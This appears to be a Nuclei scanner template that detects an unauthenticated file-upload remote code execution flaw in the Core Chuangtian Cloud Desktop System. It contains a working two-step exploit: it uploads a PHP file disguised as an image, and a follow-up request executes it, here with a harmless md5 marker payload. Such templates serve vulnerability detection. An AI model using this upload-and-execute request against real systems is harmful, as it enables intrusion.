45 lines
1.5 KiB
YAML
45 lines
1.5 KiB
YAML
id: core-chuangtian-cloud-rce
|
|
|
|
info:
|
|
name: Core Chuangtian Cloud Desktop System - Remote Code Execution
|
|
author: pikpikcu
|
|
severity: critical
|
|
description: Core Chuangtian Cloud Desktop System is susceptible to remote code execution vulnerabilities.
|
|
reference:
|
|
- https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10
|
|
cwe-id: CWE-77
|
|
metadata:
|
|
max-request: 2
|
|
tags: rce,fileupload,intrusive,cloud,chuangtian
|
|
variables:
|
|
string: "core-chuangtian-cloud-rce"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /Upload/upload_file.php?l=test HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
|
|
Accept-Encoding: gzip, deflate
|
|
Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
|
|
|
|
------WebKitFormBoundaryfcKRltGv
|
|
Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
|
|
Content-Type: image/avif
|
|
|
|
<?php echo md5("{{string}}");unlink(__FILE__);?>
|
|
------WebKitFormBoundaryfcKRltGv--
|
|
- |
|
|
GET /Upload/test/{{randstr}}.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: word
|
|
part: body_2
|
|
words:
|
|
- '{{md5(string)}}'
|
|
# digest: 4b0a00483046022100847a24e09b558135796cc3f1f6e6c844a35e4225b87601f50c1f67de5f8d3bc3022100ff20c6a7936c073d63fe9b741fa551558dd8ce217e9210cbbe979bc5d81038a0:922c64590222798bb761d5b6d8e72950 |